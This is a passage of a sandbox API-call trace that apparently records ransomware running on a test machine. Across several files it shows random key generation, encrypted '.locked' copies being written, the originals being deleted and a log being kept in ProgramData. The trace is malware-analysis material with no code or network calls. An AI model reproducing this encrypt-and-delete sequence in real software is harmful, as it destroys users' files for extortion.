[0282.460] CloseHandle (hObject=0x19c) returned 1 [0282.464] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\YRFgwGf 0zYgcMX.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\yrfgwgf 0zygcmx.flv")) returned 1 [0282.636] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0283.551] SetEvent (hEvent=0x198) returned 1 [0283.551] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0283.563] SetEvent (hEvent=0x1ac) returned 1 [0283.563] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0285.819] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0285.819] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x124a0e94 | out: lpMode=0x124a0e94) returned 0 [0285.819] WriteFile (in: hFile=0x188, lpBuffer=0x125ec2d0*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x124a0e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec2d0*, lpNumberOfBytesWritten=0x124a0e64*=0x4c, lpOverlapped=0x0) returned 1 [0285.819] CloseHandle (hObject=0x188) returned 1 [0285.821] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\P-STq-jQ5hYtJhIu5S.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\p-stq-jq5hytjhiu5s.ots")) returned 1 [0286.456] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0286.592] SetEvent (hEvent=0x134) returned 1 [0286.592] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0286.661] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0286.841] SetEvent (hEvent=0x20c) returned 1 [0286.841] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0286.870] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\zMPTOdNQ.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\zmptodnq.jpg")) returned 1 [0287.028] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0287.728] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0287.801] SetEvent (hEvent=0x14c) returned 1 [0287.801] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0298.387] WriteFile (in: hFile=0x1e0, lpBuffer=0x1298a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x1298a000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0298.438] CloseHandle (hObject=0x1e0) returned 1 [0298.797] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0299.258] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\9Q7-bFR.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9q7-bfr.xlsx")) returned 1 [0299.759] SetEvent (hEvent=0x21c) returned 1 [0299.759] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0299.809] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0299.836] SetEvent (hEvent=0x190) returned 1 [0299.836] SetEvent (hEvent=0x1b8) returned 1 [0299.836] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.441] SetEvent (hEvent=0x104) returned 1 [0305.441] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.508] SetEvent (hEvent=0x21c) returned 1 [0305.508] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.620] SetEvent (hEvent=0x1f0) returned 1 [0305.620] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.712] SetEvent (hEvent=0x1f0) returned 1 [0305.712] SetEvent (hEvent=0x214) returned 1 [0305.712] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.744] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.759] SetEvent (hEvent=0x22c) returned 1 [0305.759] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0305.792] SetEvent (hEvent=0x14c) returned 1 [0305.792] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0306.773] SetEvent (hEvent=0x21c) returned 1 [0306.773] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0306.783] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.693] SetEvent (hEvent=0x14c) returned 1 [0307.693] SetEvent (hEvent=0x1dc) returned 1 [0307.693] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.706] SetEvent (hEvent=0x14c) returned 1 [0307.706] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.710] SetEvent (hEvent=0x134) returned 1 [0307.710] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.843] SetEvent (hEvent=0x214) returned 1 [0307.843] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.859] SetEvent (hEvent=0x14c) returned 1 [0307.859] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0307.885] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.886] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0307.889] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.889] SetEvent (hEvent=0x12c) returned 1 [0307.889] SetEvent (hEvent=0x190) returned 1 [0307.889] SetEvent (hEvent=0x198) returned 1 [0307.889] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0307.892] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0307.892] SetEvent (hEvent=0x150) returned 1 [0307.892] SetEvent (hEvent=0x12c) returned 1 [0307.892] SetEvent (hEvent=0x190) returned 1 [0307.892] SetEvent (hEvent=0x198) returned 1 [0307.892] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0307.965] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\92 o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\92 o.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0307.965] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0307.965] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\92 o.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\92 o.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0307.966] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0307.966] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0307.966] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x123920f0 | out: pbBuffer=0x123920f0) returned 1 [0307.966] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0307.966] WriteFile (in: hFile=0x1c0, lpBuffer=0x124a6000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x124a6000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0307.969] ReadFile (in: hFile=0x1a4, lpBuffer=0x1530c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x1530c000*, lpNumberOfBytesRead=0x125e5d68*=0x14c50, lpOverlapped=0x0) returned 1 [0307.974] WriteFile (in: hFile=0x1c0, lpBuffer=0x1530c000*, nNumberOfBytesToWrite=0x14c50, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x1530c000*, lpNumberOfBytesWritten=0x125e5d74*=0x14c50, lpOverlapped=0x0) returned 1 [0308.084] ReadFile (in: hFile=0x1a4, lpBuffer=0x1530c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x1530c000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0308.085] CloseHandle (hObject=0x1c0) returned 1 [0308.088] CloseHandle (hObject=0x1a4) returned 1 [0308.088] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0308.088] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0308.088] WriteFile (in: hFile=0x1a4, lpBuffer=0x1264a140*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a140*, lpNumberOfBytesWritten=0x125e5e64*=0x32, lpOverlapped=0x0) returned 1 [0308.088] CloseHandle (hObject=0x1a4) returned 1 [0308.090] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\92 o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\92 o.mp3")) returned 1 [0308.180] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.367] SetEvent (hEvent=0x21c) returned 1 [0308.367] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.372] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.549] SetEvent (hEvent=0x20c) returned 1 [0308.549] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.563] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.707] SetEvent (hEvent=0x1b8) returned 1 [0308.707] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.746] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0308.746] SetEvent (hEvent=0x14c) returned 1 [0308.746] SetEvent (hEvent=0x190) returned 1 [0308.746] SetEvent (hEvent=0x198) returned 1 [0308.750] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0308.753] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0308.754] SetEvent (hEvent=0x214) returned 1 [0308.754] SetEvent (hEvent=0x1f0) returned 1 [0308.754] SetEvent (hEvent=0x20c) returned 1 [0308.754] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0308.755] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0308.755] SetEvent (hEvent=0x150) returned 1 [0308.755] SetEvent (hEvent=0x20c) returned 1 [0308.755] SetEvent (hEvent=0x1f0) returned 1 [0308.769] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\i4iTuepd632fb1KkZ.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i4ituepd632fb1kkz.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0309.516] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.541] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239fe88 | out: lpMode=0x1239fe88) returned 0 [0309.541] SwitchToThread () returned 1 [0309.541] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.542] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.545] SetEvent (hEvent=0x1ac) returned 1 [0309.545] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0309.546] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766010 | out: pbBuffer=0x12766010) returned 1 [0309.546] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0309.546] WriteFile (in: hFile=0x228, lpBuffer=0x12649000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12649000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0309.553] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0309.556] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.556] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0309.556] SetEvent (hEvent=0x150) returned 1 [0309.556] SetEvent (hEvent=0x1ac) returned 1 [0309.556] SetEvent (hEvent=0x1b8) returned 1 [0309.556] ReadFile (in: hFile=0x208, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1239dd68*=0x5f12, lpOverlapped=0x0) returned 1 [0309.559] WriteFile (in: hFile=0x228, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x5f12, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1239dd74*=0x5f12, lpOverlapped=0x0) returned 1 [0309.568] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.639] ReadFile (in: hFile=0x208, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0309.639] CloseHandle (hObject=0x228) returned 1 [0309.640] CloseHandle (hObject=0x208) returned 1 [0309.641] SetEvent (hEvent=0x1b8) returned 1 [0309.641] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.643] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.645] SetEvent (hEvent=0x1e8) returned 1 [0309.646] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.656] SetEvent (hEvent=0x14c) returned 1 [0309.656] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0309.762] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.762] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0309.827] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.827] SetEvent (hEvent=0x1e8) returned 1 [0309.827] SetEvent (hEvent=0x198) returned 1 [0309.828] SetEvent (hEvent=0x22c) returned 1 [0309.828] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.889] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0309.889] SetEvent (hEvent=0x150) returned 1 [0309.889] SetEvent (hEvent=0x22c) returned 1 [0309.889] SetEvent (hEvent=0x198) returned 1 [0309.890] SetEvent (hEvent=0x20c) returned 1 [0309.890] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0309.955] SetEvent (hEvent=0x1ac) returned 1 [0309.955] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.033] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12669a24, lpReserved=0x0 | out: lpBuffer=0x1234c2a0*, lpNumberOfCharsWritten=0x12669a24*=0xc) returned 1 [0310.111] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0310.116] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.116] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0310.157] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.157] SetEvent (hEvent=0x14c) returned 1 [0310.157] SetEvent (hEvent=0x198) returned 1 [0310.157] SetEvent (hEvent=0x1e8) returned 1 [0310.157] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.163] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0310.163] SetEvent (hEvent=0x150) returned 1 [0310.163] SetEvent (hEvent=0x14c) returned 1 [0310.163] SetEvent (hEvent=0x198) returned 1 [0310.163] SetEvent (hEvent=0x1e8) returned 1 [0310.164] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\7mm1j-VAYXO_h.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\7mm1j-vayxo_h.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0310.164] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0310.164] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\7mm1j-VAYXO_h.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\7mm1j-vayxo_h.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0310.613] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.631] SetEvent (hEvent=0x1d0) returned 1 [0310.631] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0310.631] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.697] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0310.697] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0310.697] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0310.697] WriteFile (in: hFile=0x1c0, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0310.704] ReadFile (in: hFile=0x1a4, lpBuffer=0x150da000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x150da000*, lpNumberOfBytesRead=0x12669d68*=0x10d3f, lpOverlapped=0x0) returned 1 [0310.707] WriteFile (in: hFile=0x1c0, lpBuffer=0x150da000*, nNumberOfBytesToWrite=0x10d3f, lpNumberOfBytesWritten=0x12669d74, lpOverlapped=0x0 | out: lpBuffer=0x150da000*, lpNumberOfBytesWritten=0x12669d74*=0x10d3f, lpOverlapped=0x0) returned 1 [0310.722] ReadFile (in: hFile=0x1a4, lpBuffer=0x150da000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x150da000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0310.723] CloseHandle (hObject=0x1c0) returned 1 [0310.766] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0310.950] CloseHandle (hObject=0x1a4) returned 1 [0310.950] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.108] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.108] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.113] SetEvent (hEvent=0x190) returned 1 [0311.113] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.435] SetEvent (hEvent=0x12c) returned 1 [0311.435] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.472] SetEvent (hEvent=0x134) returned 1 [0311.472] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.507] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0311.507] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x124a3e94 | out: lpMode=0x124a3e94) returned 0 [0311.507] WriteFile (in: hFile=0x200, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x124a3e64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x124a3e64*=0x36, lpOverlapped=0x0) returned 1 [0311.507] CloseHandle (hObject=0x200) returned 1 [0311.508] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\Qun29tcX.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\qun29tcx.wav")) returned 1 [0311.569] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0311.877] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\Qun29tcX.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\qun29tcx.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0312.408] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.493] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x124a3e88 | out: lpMode=0x124a3e88) returned 0 [0312.493] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.548] SetEvent (hEvent=0x22c) returned 1 [0312.548] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.550] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.657] WriteFile (in: hFile=0x19c, lpBuffer=0x15ce2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dde78, lpOverlapped=0x0 | out: lpBuffer=0x15ce2000*, lpNumberOfBytesWritten=0x125dde78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.688] CloseHandle (hObject=0x19c) returned 1 [0312.715] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.796] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\V1BQkFza0j-jprapAdp.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\v1bqkfza0j-jprapadp.wav")) returned 1 [0312.844] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.854] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.861] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.868] SetEvent (hEvent=0x14c) returned 1 [0312.868] SetEvent (hEvent=0x1b8) returned 1 [0312.868] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.969] SetEvent (hEvent=0x22c) returned 1 [0312.969] SetEvent (hEvent=0x190) returned 1 [0312.969] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0312.995] SetEvent (hEvent=0x22c) returned 1 [0312.995] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.157] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.168] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.174] SetEvent (hEvent=0x190) returned 1 [0313.174] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0313.179] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.179] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0313.182] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.182] SetEvent (hEvent=0x1b8) returned 1 [0313.182] SetEvent (hEvent=0x22c) returned 1 [0313.182] SetEvent (hEvent=0x1e8) returned 1 [0313.182] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.183] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0313.183] SetEvent (hEvent=0x22c) returned 1 [0313.183] SetEvent (hEvent=0x1e8) returned 1 [0313.183] SetEvent (hEvent=0x1b8) returned 1 [0313.183] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: 